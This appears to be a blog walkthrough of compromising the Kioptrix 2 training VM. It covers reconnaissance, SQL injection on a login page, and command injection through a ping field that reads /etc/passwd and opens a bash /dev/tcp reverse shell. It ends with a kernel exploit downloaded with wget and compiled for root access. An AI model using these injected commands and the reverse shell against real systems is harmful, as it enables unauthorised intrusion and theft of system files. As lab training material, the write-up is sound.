- Download Kioptrix 2 vulnerable machine from vulhub
- Import the kioptrix machine in vmware and then do below mentioned configuration
- go into config file and search for bridged then replace it with NAT, as mentioned below in screenshot.
- fire up the Kali and kio 2 machine
- Finding IP: -
- run arp-scan -l - to find the kio machine's IP
- nmap scan: -
- Started from port 80 enumeration: - Nikto scan found web server name and exact version
- Run dirb, to find the directories available at server
- found a login page
- tried sql injection on this as mentioned below: -
- One of the statement gave the assess as mentioned in above screenshot. Now we have a ping functionality available in the application.
- Tried to do command injection with simple statements.
- 192.168.32.128;ls - to list current folder's files.
- To open /etc/passwd file because it is a linux server
- 192.168.32.128;cat /etc/passwd
- Now time to upload a reverse shell
- 192.168.32.128;bash -i >& /dev/tcp/192.168.32.128/3333 0>&1 - enter this input and run a nc listner before submitting this input.
- Reverse shell will pop up with limited privileges/non-admin.
- PRIVILEGE ESCALATION
- Download exploitdb exploit as mentioned below.
- Modify the exploit as it will not work ( when you will try to compile it at victim machine it will throw an error related to lines )
- At the end of below mentioned code : - the print line is added
- Transfer the exploit code file to victim machine with the help of wget command
- complie it with the gcc tool as mentioned in the screenshot below.
- provide the executable permissions.
- Then run it. You are root now.
Comments
Post a Comment